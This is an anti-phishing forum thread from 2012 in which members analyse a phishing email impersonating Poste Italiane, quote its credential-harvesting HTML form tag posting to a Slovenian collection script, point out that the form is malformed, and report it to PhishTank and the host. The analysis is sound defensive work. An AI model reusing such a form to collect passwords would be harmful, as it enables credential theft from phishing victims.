What's this phish doing?

Phishing operations, including perpetrators, how to report them and get them shut down.

Re: What's this phish doing?

Postby NotBuyingIt » Fri Jan 20, 2012 9:09 pm

Regarding http://www.spamcop.net/sc?id=z5229153446z9f151b466025ba16b4c8e4baad30b919z;action=display ,
efa wrote: ... and no POST tag are there.
I noticed this:
Code: Select all
<FORM NAME="Login" method="POST" action="www.emo-ett.si/done.php" onsubmit="javascript: return logintest(this);">

The email constructs an HTML form that collect passwords and other data. I did not test the form to see if JavaScript altered its action, but it appears to use a POST service provided by www.emo-ett.si (in Slovenia) that logs the stolen data before redirecting to the legitimate http://poste.it site.

I have taken the liberty of sharing the email message with PhishTank: http://www.phishtank.com/phish_detail.php?phish_id=1346220
and with WOT: http://www.mywot.com/en/scorecard/emo-ett.si/comment-39291654
The PhishTank screenshot most probably shows the legitimate Poste Italiane web page, after the redirection which I mentioned.

[Edited for grammar.]
Last edited by NotBuyingIt on Tue Jan 24, 2012 2:33 am, edited 1 time in total.
NotBuyingIt
Spammer Killing Machine
 
Posts: 612
Joined: Sun Jun 13, 2010 5:22 pm

Re: What's this phish doing?

Postby spamislame » Sat Jan 21, 2012 12:51 pm

I'd like to add that the complete idiot behind this particular phishing effort hasn't even constructed the form properly.

Code: Select all
<FORM NAME="Login" method="POST" action="www.emo-ett.si/done.php" onsubmit="javascript: return logintest(this);">

That will fail. He didn't include the "http://" in the "action" portion of the form tag, so it will look for a local file named "www.emo-ett.si/done.php", which doesn't exist.

Worse: he hasn't labeled his inputs, so there are five fields which aren't described, for which the phishing victim won't understand their expected values.

A true genius. :roll:

I'm reporting the phishing attack to the hosting company for emo-ett.si. Never hurts.

SiL
User avatar
spamislame
Site Admin
 
Posts: 5058
Joined: Tue May 09, 2006 9:18 am

Re: What's this phish doing?

Postby efa » Mon Jan 23, 2012 5:29 pm

oh, was a bug in xPhish V.0.01.04 2011/11/15.
I corrected this in V.0.01.05 2012/01/23, now it can find POST links also when no other NOT scam links are found.
Thank you.
User avatar
efa
Spammer Exterminator
 
Posts: 1061
Joined: Wed May 02, 2007 8:59 pm

Previous

Return to Phishers

Who is online

Users browsing this forum: No registered users and 1 guest

cron